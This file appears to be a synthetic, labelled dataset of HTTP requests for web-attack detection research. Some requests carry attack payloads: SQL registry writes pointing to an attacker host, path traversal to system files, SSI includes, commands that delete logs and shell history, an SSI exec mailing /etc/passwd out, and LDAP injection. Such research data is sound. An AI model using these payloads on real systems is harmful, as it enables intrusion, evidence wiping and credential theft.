Proxy-Authorization: Digest opaque="sqsll"
Authorization: eotpD tuweeo=plts5pr
Range: -397
Referer: http://tnjrolro.fr/4a3sas/rtesmorn.msf
TE: trailers,chunked;q=0.0,trailers
Trailer: Accept-Language
User-Agent: b1hht2nieeiaMctmqh1
UA-CPU: PowerPC
UA-Disp: 926,7799,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 194x0684
Via: HTTP/5.8 71.103.187.8
Transfer-Encoding: proa2
Upgrade: rsie/6.2, ped/8.7, tlgq/8.5, FsiO/2.3
Warning: 451 198.72.245.237:3639 "gyrmlem" 
X-Forwarded-For: 84.186.228.20
X-Serial-Number: 54708069609443708
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41101
Start - Id: 6354
class: Valid
PUT /doa6Aoideg9epau/Toencwabo/bgroup byE-b/e3nkaot0aredshSe856/1T9K@img9b/e6rlousalro9/t.Z2T22cel/sPEQv5p5XFtXk/mzo_4/Kmv/ruyELkyweMsKn.gif? HTTP/1.0
Content-Length: 70
Content-Language: Ueibi
Content-Encoding: compress
Content-Location: /nexo/ata5ha/othit/gioH4/irddro.exe
Content-MD5: Y2FEaGhvdWNhaWVnMmlyVA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 08 Mar 09 02:40:54 UTC
Last-Modified: Thu, 29 Apr 04 08:05:34 GMT
Host: 6.35.182.179:80
Connection: 0Oxe
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: Xeq-eIl
Cache-Control: only-if-cached
Client-ip: 176.137.0.206
Cookie: hQeao=8fTsi(o+ean3rl
Cookie2: $Version="89"
Date: Tue, 26 May 09 06:53:12 CET
ETag: W/"Jf.cuX_UWu5ZO8OfC"
Expect: 100-continue
From: Feaiiis@ephhottrtd.fr
If-Modified-Since: Fri, 26 Nov 04 10:54:07 GMT
If-Unmodified-Since: Thu, 06 Jan 05 05:21:43 CET
If-Match: "MZXsrSJ6@3stpgwObV"
If-None-Match: "ebG8kK1R16eqK3XpKoke"
If-Range: "4m@eOybDwagQnb2koCRV"
Max-Forwards: 75
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: aen7id oieu=nltawfeo
Authorization: Basic cm1lbjpyT2U2QWFldQ==
Range: 00-,-67542,3-02025
Referer: /oorzX.htm
TE: trailers
Trailer: Accept-Charset
User-Agent: szeviiu (hWvYmt1ca)
UA-CPU: PowerPC
UA-Disp: 9856,9678,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 011x730
Via: 6.5 147.11.254.57, 7.1 56.17.1.251:90745
Transfer-Encoding: eeto; eaop0o=Deew
Upgrade: rulnU/7.5, nxo/0.0, a7o/6.8, murs/5.4, a2moai/2.1
Warning: 558 185.158.218.63 "1di3vy7ene9psr" "Sun, 23 Apr 06 02:25:49 GMT"
X-Forwarded-For: 253.132.79.208
X-Serial-Number: 24665445905295442
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

tav9t1t=erfetbetweenaEqetin 2hq&EttEnwY7nnthre=telnetnhtmdivu\$t t

End - Id: 6354
Start - Id: 8911
class: Valid
GET /fusrZ7h0d.b/sU5x554/cbnuvyi61h07EOXxF.exe?pLjee=29424071&rk4elndtsua=ic35&ewq1riaoeindoiw=bFe&OOhotHvt=41364&nbe=63&zRnw=e1ili0ctV3nwLoea&az9jn8=309264&ioetsotn=h9%3D%3A HTTP/1.0
Host: www.omij.fr
Connection: grtnde
Accept: */*
Accept-Charset: windows-1251;q=0.7
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: min-fresh=2351
Client-ip: 178.118.114.226
Cookie: enoiuaS=evalo6y;kiepudloeees=427
Cookie2: $Version="266"
Date: Sat, 11 Jun 05 19:24:58 CET
ETag: "o_YERB0dpVOt2YXC"
Expect: d9ctOe=heth;tUanr5o=xgazT
From: gyture4e@b1eUnPsa.de
If-Modified-Since: Sat, 13 Aug 05 08:10:37 CET
If-Unmodified-Since: Mon, 26 Sep 05 13:50:11 UTC
If-Match: *
If-None-Match: "J41NEoiNYYC_GZ7b"
If-Range: Sun, 14 Jan 07 15:00:50 GMT
Max-Forwards: 580
MIME-Version: 7.9
Pragma: u5stz=rmr
Proxy-Authorization: NTLM ZGVuZDRtZ2hyY3Jub29ld3RhZWZoZnBrc0E5T2NNZWVtcGlheGdIbEllUm1la2Rn
Authorization: NTLM eWNlbnV0cmllb2phbGVudWE5aTJlZWxvc3JtNmk2ZW8=
Range: 7-3572
Referer: http://www.ntIac.cz/adsrmso4.nsf
TE: chunked;q=0.4,trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/3.6 (Machintosh; U; PPC 7.4; jl-ax; rv:2.6.5) Gecko/94665928
UA-CPU: 68000
UA-Disp: 7865,493,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 000x5970
Via: HTTP/8.3 145.159.52.95
Transfer-Encoding: deflate
Upgrade: oaefte/2.4
Warning: 052 65.130.149.140 "iFomeu7jcadiest" 
X-Forwarded-For: 219.111.245.62
X-Serial-Number: 266699
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 8911
Start - Id: 36417
class: OsCommanding
GET /7AvSpositiono9D8QH8Lxp_b/cuLd4/cwP6Wf/oeEss6eI/eiicaHwdMba/tpsps/qovf1do.tiff?ftloo0ahSnS=9nostd&L61img1nla6Ptmpz=exec++xp_regwrite++%27HKEY_LOCAL_MACHINE%27%2C%27SOFTWARE%5CMicrosoft%5CMSSQLServer%5CClient%5CConnectTo%27%2C%27oh%27%2C%27REG_SZ%27%2C%27DBMSSOCN%2Chackersip%2C80%27 HTTP/1.1
Host: www.swmlkhLaew.ch
Connection: close
Accept-Charset: *
Accept-Language: en2aoa-e3hel;q=0.7
Cache-Control: g='pneia8i'
Cookie: cYzxhavingrXK5yJT=eL
Cookie2: $Version="13"
Date: Sat, 13 Nov 04 07:40:02 UTC
If-Modified-Since: Sat, 08 Mar 08 24:21:51 GMT
Max-Forwards: 268
Referer: http://www.Sv4Nhr.st/tuinhqa.asp
User-Agent: Mozilla/9.1 (X11; U; Open BSD i586 9.1; as-dc; rv:8.6.6) Gecko/58666813
Via: 3.0 236.137.100.19
Transfer-Encoding: thstT

null

End - Id: 36417
Start - Id: 12447
class: Valid
GET /skeeXszsuasdapE.jpeg? HTTP/1.0
Host: www.tihi.uk
Connection: close
Accept: audio/x-wav, image/gif, image/jpeg
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 151.194.8.107
Cookie: otuhsibu=na4ta;bbrdbohIAnlcrli=Y;srNs=299186;oetson3sjavtdn=oesom;eltadge=ddbaag;abe2=eandUomdr6ovbscriptl
Cookie2: $Version="0"
Date: Sun, 06 Sep 09 14:40:32 UTC
ETag: ".2xnRT2PSQ1bvoOqH"
Expect: c9dlSu=tdeo;pstejt
From: eoirpN@eichoAt.biz
If-Modified-Since: Wed, 10 May 06 14:03:38 CET
If-Unmodified-Since: Mon, 04 Aug 08 15:12:14 UTC
If-Match: "P4uFheYcJQMmMSyp"
If-None-Match: *
If-Range: "b.kZYWNSIOLfPcYD"
Max-Forwards: 28
MIME-Version: 3.6
Pragma: bhriEaNg=elt9lnmy
Proxy-Authorization: 4erp ldeiylno=ehazosaa
Authorization: 48mS dcysetE=gtDum
Range: 695-9884,263228-,861384-4137
Referer: http://zdeWa.uk/ntlsen/djoi/mteclss/eneew/eoiewl.mspx
TE: deflate;q=0.8
Trailer: User-Agent
User-Agent: Mozilla/5.7 (Windows; U; Windows NT 6.6; 47-he; rv:8.4.1) Gecko/81053599
UA-CPU: PowerPC
UA-Disp: 0802,3445,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 357x295
Via: 2.4 79.180.192.135:7237, humed/2.6 www.iAirot.jpeg, 7.9 138.80.121.170
Transfer-Encoding: compress
Upgrade: smr/8.6
Warning: 342 www.7riin7e.css "bswei9il" "Fri, 24 Jun 05 02:30:17 GMT"
X-Forwarded-For: 238.20.116.20
X-Serial-Number: 31499732572792
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12447
Start - Id: 2641
class: Valid
GET /feoeelrtUe/yW@K8iQm1/oentv30t/8td6rii0ir9AmaHQ.htm?lehinsx=1112593680&8E=edqhe&lneka2wl0=gfVltE-Fnd&scegN8aluasce=tAs0ss%25bmhy+%7C%24&hz=+ovYn&evsbStOsneoa=76576&C-8TL-Ia=81Npo2T5LQ&ifeit=4 HTTP/1.0
Host: www.xfgsme.org:80
Connection: keep-alive
Accept: text/*, text/*
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.2
Accept-Language: savt-wrr, netafeo-dhhts;q=0.8, sIe-jhod
Cache-Control: no-transform
Client-ip: 39.187.33.197
Cookie: inIr8ufrrgokew=bh@;rticecjN=pdqX4OlQ7
Cookie2: $Version="2"
Date: Tue, 27 Apr 04 05:03:30 CET
ETag: "mF9xaNTdjYBgCEcGVr5_"
Expect: eete=ebyt;egeE
From: hcqlau@ypyesaoel.fr
If-Modified-Since: Fri, 22 Jun 07 09:42:45 GMT
If-Unmodified-Since: Tue, 11 May 04 10:19:16 CET
If-Match: *
If-None-Match: "44gJu3m._LXFd2or2c"
If-Range: *
Max-Forwards: 9
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.noelxt.uk/uceliu/partes/cnIjab.mdb
Authorization: Basic dE50aXBsZW46aHRmb3NMb00=
Range: 78017-732
Referer: /dout/Leits9/jtporlF.nsf
TE: trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/6.7 (X11; U; Open BSD i586 9.3; ui-f7; rv:4.5.7) Gecko/90075056
UA-CPU: StrongARM
UA-Disp: 409,1827,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 907x1790
Via: FTP/1.1 www.qrqucylo.html, HTTP/5.0 www.uebn.shtml
Transfer-Encoding: identity
Upgrade: YMots/9.9, 2loo/9.6, cgTcde/7.3, ltne1/8.2, mro0ot/2.9
Warning: 078 www.szqtvs.css "oi2amserJaitbewq1eCw" 
X-Forwarded-For: 196.188.242.124
X-Serial-Number: 8136074594585
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2641
Start - Id: 45491
class: PathTransversal
GET /m2zqdHaccept.glw/e1oq-Cm9OGc5/eistro/UitrdrlaeRtu9dbu1om1/9-jvEjV2nlCK/f@hUdKscriptD.89O/eeVede8atret/leTamgoea/5P.eSV9MGGj@70C/bgsoundnsrwhttpsA/8OSlibwU.jpg?blWdHS=3&TLytHywe=tqueqstehRplezO&tajnwmteidir=741633&Xtd=teem&dnta=..%5C..%5C..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&rscc0iquti4ar=n%25u%5C&@linkxYKF=ty+ec&ii0edo=optsne%5Ds%7CTa2Ai HTTP/1.0
Host: www.et1i4smky.ch:0194
Connection: keep-alive
Accept: video/*;q=0.0
Accept-Charset: *;q=0.9
Accept-Encoding: gzip;q=0.1, compress;q=0.0
Accept-Language: reiztns5-r39igow, 3hsbhwre-o3vghdn;q=0.1, u-na;q=0.4, Pr-yf3uresh;q=0.8, Q-hrzHu;q=0.1
Cache-Control: no-cache
Client-ip: 165.251.254.128
Cookie: sdddEeuetexrqi=05003704
Cookie2: $Version="76"
Date: Fri, 06 May 05 23:13:48 UTC
ETag: "SQQiLGzppLASCU-m"
Expect: 100-continue
From: rddIbt@n7reian.st
If-Modified-Since: Mon, 21 Mar 05 05:10:53 GMT
If-Unmodified-Since: Sun, 16 Jan 05 07:58:16 CET
If-Match: "hpzGBWQafP.aIzeIr3Yj"
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: NTLM VXRlZ290YnM0YU50ZjJsSWNoc3RqSWxtc2lvZU9pbXJuRWU=
Authorization: NTLM b3Q1cmZ1T21hOGFpOGN1MnRub2xIZTBoZWkxaW1oN25ub3JlbWx1YW9zYQ==
Range: 7-
Referer: http://i7d2sag.fr/yy3ne3q/tbzheet/kI5eeieo/tunjeeph.rar
TE: deflate,chunked,deflate;q=0.4
Trailer: Expect
User-Agent: Mozilla/3.2 (Machintosh; U; PPC Mac OS X 0.1; ln-em; rv:4.3.5) Gecko/26694559
UA-CPU: MIPS
UA-Disp: 187,4216,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 6084x210
Via: HTTP/2.2 www.oOeh6.css, 6.4 www.o7xam1q.shtml
Transfer-Encoding: dlra; 8toi=srrd
Upgrade: drf/1.3, eoe/9.9
Warning: 402 1.54.207.201 "lrklpe" 
X-Forwarded-For: 108.147.8.117
X-Serial-Number: 8223453
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45491
Start - Id: 30289
class: Valid
GET /oyaX65fVBT-I/lrSNejeechc/fPfdQy/aYTOMsKBFDPkJNUxY/eN/i4xm3Y_EfY_9rU/rfRabbpbn/IdJ/181laudi.mspx?hhrwm=shw%2B8n4&t4rt8rpwrT4e=75426493&XvrWNGmYV=f_laVCYKjs&aad0=645&t3saeT=aanph-%24slibnR&pnrh=tw2rAdKCB9_&a3r=tus&eesitu=Fae HTTP/1.0
Host: 128.187.61.218
Connection: keep-alive
Accept: video/*, audio/*
Accept-Charset: iso-8859-4, windows-1251, euc-kr;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 143.233.185.29
Cookie: MYTC=9B@mGPZ8RyYW;teugwdE23daeC=ltsalea
Cookie2: $Version="18"
Date: Tue, 10 Jan 06 05:43:12 CET
ETag: "qD-cIxWnIgufy6Wwdjh"
Expect: 100-continue
From: hgNhns@5tun.biz
If-Modified-Since: Fri, 09 Nov 07 05:10:21 CET
If-Unmodified-Since: Sun, 18 Jun 06 11:20:05 UTC
If-Match: "xnxGeJz.cuFrDtJf5"
If-None-Match: *
If-Range: Mon, 27 Nov 06 12:32:57 GMT
Max-Forwards: 1669
MIME-Version: 1.6
Pragma: jdv=kfEea
Proxy-Authorization: Basic ZWR0dDpFaGVvOQ==
Authorization: Basic YXRhZXR0OmlwYXlh
Range: -915389
Referer: http://zissaci.fr/hRhr/loHn4sQV/wies/weis2o.sh
TE: trailers
Trailer: Range
User-Agent: Mozilla/6.8 (X11; U; Open BSD i586 8.2; at-Oi; rv:4.4.7) Gecko/36256513
UA-CPU: MIPS
UA-Disp: 132,042,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 691x450
Via: Usalti/0.8 www.mei5.png
Transfer-Encoding: identity
Upgrade: 1nt/1.0, ro5lno/8.9, ef7eT/2.2, flzros/0.3, raaae/2.1
Warning: 610 www.asyfa7.png:791 "eaiobtefu" "Tue, 13 Apr 10 21:48:36 UTC"
X-Forwarded-For: 102.149.83.187
X-Serial-Number: 60742
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 30289
Start - Id: 36161
class: PathTransversal
GET /txyt.php?umblv_9XG=u0I&pdbtdocem3f5r=i3nE1Enu3dt&0ieor6Gihnr=agK2C%40w4Lj&ddyhetghseph=%5CWINNT%5Csystem.ini&DHf59GchildYu=bqofer5pahbj HTTP/1.0
Host: www.ixswNve.st
Connection: close
Accept: */*
Accept-Charset: koi8-r;q=0.8, cp-936, x-mac-japanese
Accept-Encoding: identity;q=0.2, compress;q=0.0, deflate
Accept-Language: *;q=0.9
Cache-Control: max-stale
Cookie: wTetd=execs06s
Date: Wed, 19 Nov 08 07:35:52 CET
ETag: W/"Ur6v1GbQqi5Fpv3B_GUc"
Expect: liewd
From: esie@ntoatbni.fr
If-Modified-Since: Mon, 01 Sep 08 03:38:59 UTC
If-Unmodified-Since: Sat, 28 Nov 09 14:24:00 GMT
If-Match: "7cAowJHq65MW.4zV2d"
If-None-Match: *
If-Range: Sat, 03 Jan 09 23:48:55 GMT
Max-Forwards: 7
Pragma: no-cache
Proxy-Authorization: Basic aERueDp0b2hKMWVu
Authorization: NTLM YzMxZGc4bWhyZW41YmZ0c3Vkbm45b04wcE90dGVpY3hGenNF
Range: 883-12,6163-,33622-
Referer: /8r0jMrUn.asp
TE: trailers,gzip
Trailer: Accept-Encoding
User-Agent: adtoeth (e8nM3AA1; 82A0rL1U; eEoDAOCZs; lxEAXp9L6)
UA-Disp: 4206,422,32
UA-Color: color32
UA-Pixels: 5546x388
Via: 7.8 27.46.195.168, 8.8 10.97.140.165, 1.0 127.166.226.111
Transfer-Encoding: e2ousn
Warning: 176 103.233.4.139 "gothscr7a4n" 
X-Forwarded-For: 1.210.150.248
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36161
Start - Id: 40370
class: SSI
GET /Wwi8ajsfrp/et/gBPxtermdVgfaHcfj3D/8r00rweeh/nullo1cdnull97/e7YdWePP/83catpjJ@coCgX/3hG/cr0osX2CIJFB5hh2B/u_JaYR4flG.F2O_i.LK/dtdM.mdb? HTTP/1.0
Host: 95.217.248.201
Connection: dye0
Accept: application/*, image/*, application/postscript;q=0.8
Accept-Charset: *
Accept-Encoding: *
Accept-Language: <!--   #include    virtual="c:\winnt\system.ini"-->
Cache-Control: no-transform
Client-ip: 205.71.235.181
Cookie2: $Version="95"
Date: Fri, 05 Oct 07 05:08:17 GMT
Expect: bmefii
From: imeqTeI@ieix.be
If-Modified-Since: Thu, 16 Apr 09 01:16:56 UTC
If-Unmodified-Since: Tue, 13 Feb 07 18:06:39 CET
If-Match: "J7yYKXLte6Dwf1mG"
If-Range: Thu, 15 Mar 07 16:41:22 GMT
Max-Forwards: 270
Authorization: Digest qop=idiktc6t
Range: 94-8,3-346
Referer: /nd5dee/thrl/R648cng/to0orapX/ewirh.tiff
User-Agent: <!--    #include     virtual="d:\windows\autoexec.bat" -->
UA-Disp: 262,190,16
UA-Pixels: 0869x247
Transfer-Encoding: deflate
X-Serial-Number: 01774091541450875

null

End - Id: 40370
Start - Id: 29283
class: Valid
GET /processing-instructionmocha4CrincludeAoK152X/lY135rXD21rUklr3wM/eIKiI/h_rryr_Sr.u@Fxb7Z/aesjlis/hhwethdtTuHasai/n5An/M7shutdownut.php?TEea=glocationzlcrJewsxr%3Cabbek&peD3HxtditH=9SpsstyleLem+lue3&8W6O1fxO0=mSTIYcFx5p3&fnc=bl%3Ce7&toaeeo0T=aCcI6KffRR&reu3=751&yTi7echo=foaetci HTTP/1.1
Host: 129.61.219.158:80
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1258
Accept-Encoding: *
Accept-Language: 4one-getipe6e, jt-lmH, o-oo7dad, ndt5fi-7osR8g;q=0.9
Cache-Control: min-fresh=8900
Client-ip: 173.164.32.242
Cookie: b1tdeQneotAeou=iois odtthWt;zpotit=3g;no9rN3tpsIe=n6-quGUSQa
Cookie2: $Version="81"
Date: Mon, 11 Jul 05 12:14:36 UTC
ETag: "ZHdm6TYrWo@wSm@6fx"
Expect: Molt
From: oEub0ied@kr47.com
If-Modified-Since: Wed, 01 Feb 06 23:34:42 UTC
If-Unmodified-Since: Mon, 30 Mar 09 01:26:54 CET
If-Match: "dKh9UG3zDSa0kYW4Y08_"
If-None-Match: "5BuF73_97vv08nidMHD"
If-Range: *
Max-Forwards: 242
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: Basic dHBlbE5mOnJjYkVlc0E=
Authorization: NTLM ZU9hdHNvYTNuaW9Bb0NuZWxFanVidWV6dGdlb3lmU2d0dDY=
Range: 26325-226828,6-
Referer: /gtditcn8/ikeltw/rf6z/or4nm.rar
TE: trailers,trailers
Trailer: If-None-Match
User-Agent: spr0ncnrtnegamuo
UA-CPU: StrongARM
UA-Disp: 7798,9897,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 727x388
Via: HTTP/2.4 247.60.163.2, 3.2 202.214.210.197, 6.2 www.Ard0.html
Transfer-Encoding: eoud; wsaam=tcco4
Upgrade: rheDt/0.4
Warning: 713 www.ouaaoag.html "blntkt" "Sat, 17 Jan 04 18:03:57 GMT"
X-Forwarded-For: 110.4.41.253
X-Serial-Number: 74768030946395
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29283
Start - Id: 36796
class: OsCommanding
GET /nrmEtdeR5a2g/pNrxmle/5Do822-AROHMOY4/trCKr_SJ-WuE.jsp?ieu=%250arm+++++-f++%2Fvar%2Flog%2Fhttpd%2Faccess_log%3B HTTP/1.1
Host: 241.105.199.250:96096
Connection: keep-alive
Accept: application/rtf;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 215.243.66.219
Cookie: Eofsanbzd=0>=h;9D0os=cBoSTui.F-dJ;nre7eqm=connectdo;1nT0AeseioriH=13197813
Cookie2: $Version="08"
Date: Sat, 19 Nov 05 15:08:41 CET
ETag: W/"8334JjPUOIE_-tVFu"
Expect: sid9n=eluiuds;m3ishri=rjmr
From: wsCala@r0ragpmo.de
If-Modified-Since: Tue, 02 Sep 08 21:53:29 GMT
If-Unmodified-Since: Fri, 07 May 04 15:41:16 GMT
If-Match: *
If-None-Match: "Aif7YJnnT6Pe-lSeVYHD"
If-Range: "veBP4ERr77NlUMgYmQ"
Max-Forwards: 62
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: ul8wy wpHmreh=nsssH2
Authorization: Digest qop=auth
Range: -696,54746-
Referer: /lyRT/sttGie4.bin
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/5.0 (Machintosh; U; PPC 3.4; si-wa; rv:6.1.0) Gecko/89624017
UA-CPU: PowerPC
UA-Disp: 9579,9287,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 232x1783
Via: 3.2 www.eitw.htm, ess/9.1 www.syhgu.jpg, HTTP/0.1 www.emmjrti.css
Transfer-Encoding: hpn1s
Upgrade: wfs/7.4
Warning: 870 www.spydgb.jpg "hrhsaomoChmoogw" 
X-Forwarded-For: 37.3.209.174
X-Serial-Number: 51873709956197
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36796
Start - Id: 43209
class: OsCommanding
GET /n3lsq.shU@xk/lhce9g1acer3/AnZ1tbr595pT/hF/vv/zeJSNoJ_4Y/ToetB/lbmtyfB6licontu/s55@6VcsoQx6R7hSr/njM0C_/ng8S2Nav/uMhYfnjRI.zreQK.htm?Eneefaieeirarih=gybn0sbheeattxs9&edtf=9bmek&h8totSsteEtw=tPqRD&nzehhhzO=adt&K6vQgv@UL=coil&TpasswdtelnetNEdkzAu5=systemsnc&Z2vPpC=%27+%3B+rm++%7E%2F.bash_history+%3B&VUA5XAW7Yn=483623&_E5bnMX=select0--nEeaeS&Fsseatimvaqly=6rOk%3Bn&khliofeeh8tfx=o%3Bn%5Bm&JzrRchildL=tldtatNcUab HTTP/1.1
Host: www.asRti.org
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: eyi-oetniwm, s-l
Cache-Control: min-fresh=135
Client-ip: 59.228.253.1
Cookie: Ins=7
Cookie2: $Version="350"
Date: Wed, 21 Jan 09 24:32:04 GMT
ETag: W/"oGyzD5bjuhHnWjG"
Expect: nits
From: ae6na@rbiuoetitt.st
If-Modified-Since: Thu, 25 Sep 08 02:25:56 GMT
If-Unmodified-Since: Sun, 06 Jan 08 03:50:28 CET
If-Match: "_Izm4xKtl.Xnnh24E5mY"
If-None-Match: *
If-Range: Wed, 01 Oct 08 14:18:22 GMT
Max-Forwards: 0
MIME-Version: 7.7
Pragma: Eilb=e
Proxy-Authorization: mfey smnSW=fltvk
Authorization: NTLM c2FjdGVhaTg0aW9hMmNpcm8yQ2FyYWh4b3VjdDR1N2VlOHVJYQ==
Range: 66907-4
Referer: /eEotstna/1slneuot.jpeg
TE: chunked;q=0.4,gzip
Trailer: User-Agent
User-Agent: Mozilla/9.2 (Machintosh; U; PPC Mac OS X 1.5; n8-6c; rv:0.5.8) Gecko/12432724
UA-CPU: 68000
UA-Disp: 1503,1276,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 953x846
Via: FTP/4.4 206.182.30.224:547, 0.5 www.douzjhqt.gif, 2.7 236.196.72.225
Transfer-Encoding: lauvse; eychmig=l1athgp
Upgrade: cieon/9.6, fEu/4.3, uUa/0.7, eme/1.4, aopoq/1.0
Warning: 067 www.whHhen8.tiff:01 "nyi9rr1Caal" 
X-Forwarded-For: 36.57.46.253
X-Serial-Number: 3512760212193
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43209
Start - Id: 37561
class: LdapInjection
POST /yPThZQrCfBCbmfEg.cgi? HTTP/1.1
Content-Length: 336
Content-Language: ebs,ohIe,jpm
Content-Encoding: gzip
Content-Location: /detqe/etreqo/erE0/unenql.tar.gz
Content-MD5: bGhoeWVGSXQ0bXdhdHNobg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 10 Mar 04 11:03:05 GMT
Last-Modified: Sun, 03 Jun 07 03:02:09 CET
Host: 208.61.168.85:295
Connection: close
Accept: application/zip
Accept-Charset: iso-8859-6, x-mac-icelandic, shift_jis;q=0.1, x-mac-ce, isiri-3342
Accept-Encoding: *
Accept-Language: uha-czu;q=0.3
Cache-Control: no-cache
Client-ip: 229.190.23.163
Cookie: sOomnmz4s=tihr7ue;4iurcleomtdsh5E=QaeonullkfJt];lsDy=174655;We.WWphpcuj5X-=203
Cookie2: $Version="0"
Date: Wed, 05 May 04 04:14:33 GMT
ETag: "CiFBiQN6uzs39biv-lXG"
Expect: liIlS
From: oenu@5hnawusete.de
If-Modified-Since: Thu, 14 Jan 10 05:27:36 UTC
If-Unmodified-Since: Tue, 02 Nov 04 05:12:08 UTC
If-Match: "5HrHWNqt-vzBcgI8"
If-None-Match: "0@97sd1tg20V@8F-"
If-Range: Mon, 16 May 05 05:58:40 GMT
Max-Forwards: 0
MIME-Version: 9.9
Pragma: sh6h5t='haceYer'
Proxy-Authorization: Digest opaque="rtsrac"
Authorization: NTLM aWVubmxHb3JldmZSZ2lsMWlhTmhDbHNxaGk3ZGhhb0R1b2lvTDh4dnNjTk1lWW90
Range: -78728,9752-,0169-21
Referer: http://iafcpax8.gov/mg7Vseo/mtroh.dll
TE: deflate,chunked;q=0.5,trailers
Trailer: If-None-Match
User-Agent: Mozilla/1.0 (Windows; U; Win 9x 2.9; de-r3; rv:8.3.8) Gecko/08580582
UA-CPU: PowerPC
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 1680x065
Via: 6.5 www.uf7ept5.jpeg, eAsedr/7.2 www.9ttm.css
Transfer-Encoding: compress
Upgrade: etMr/2.7
Warning: 065 105.103.99.69:35 "ltome" 
X-Serial-Number: 01594707388200191754
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nsvnnYhbsne=eo5$ &Yd23TO=35575188&lltqtIiasa=iNaop&lr4q9sdo9ld=[hrse6&XCsamOmLTJtcat=ntClhhdt po&erntejte0oi=iHwT&tMnodgit=81584&z1getap=qnihoce0ee&4ro=|W&2xre78=7467091&levt=asm3ozidd<slsa&ech6kp6O0=)(   |( cn=*o'brien*    )(mail=*o 'brien* )  &nyoqBs=elD_b5zkPQoI&caetn5whr=e&gihlhn6sst8yers=skltioeoonte

End - Id: 37561
Start - Id: 39970
class: SSI
GET /x8/yeate6asztet/hptfyIN/stttlhrJne/AD/hI/eydqdqy/_Wc0Foy.mfimg/hFITiL/SSL1.htm?slH=354206&ftiaosrensc2er=mdutk8a&Qtteen=461264705&.1FwgetNO=9&friashukDEda=dsnT&0QBjimg7KHif8B=%3C%21--++++%23exec+cmd%3D%22%2Fbin%2Fmail++++ee0cUn.com+++++%3C+++++%2Fetc%2Fpasswd%22--%3E&oebphyotf=r%26hAnam+eolr&eznxeeet3=717469&0n@LjyDnph-4ow_=84665014&n4e=lAsreoae2S5tsaitn5&wiqswp-a=4143027&beh=sBmY_Og8&on=0 HTTP/1.0
Host: www.muLE.cz
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-6, windows-1250, iso-2022-kr;q=0.4, cp-936
Accept-Encoding: gzip;q=0.6, identity;q=0.4, gzip;q=0.9
Accept-Language: Looen-zet, n2woh-5e;q=0.6
Cache-Control: esnlQsy='rmo'
Client-ip: 160.248.173.144
Cookie: xcWst1i=stodo8cd3n(s+2 an&;h5secnuuem=e 5sock_stream@eveuo$;5tooeesi=89;1Ou2NtnrhVm=zae1i4HeeasOso1mS;iulmu1oed=9ca4lobr;g01trhr7giE=aki0h
Cookie2: $Version="03"
Date: Tue, 11 Sep 07 10:50:30 UTC
ETag: W/"AZnigfVHFs0zM56rr"
Expect: AItosemo=ysen
From: qaol9@aa3eqiae.fr
If-Modified-Since: Thu, 23 Jul 09 20:11:20 GMT
If-Unmodified-Since: Fri, 05 Jun 09 24:30:08 UTC
If-Match: *
If-None-Match: "BLUP6TPLW4CHNRW"
If-Range: "YavZqkjOeTOFp6nQ"
Max-Forwards: 912
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: aHtMee s2lgu=6eHelq
Authorization: Basic ZHJpdGpwdm86aXFmZWZj
Range: 67904-931063
Referer: /keyen/DLudj/iedi/Ehrten3/gBscutr.gif
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: jhsa/5.5.3
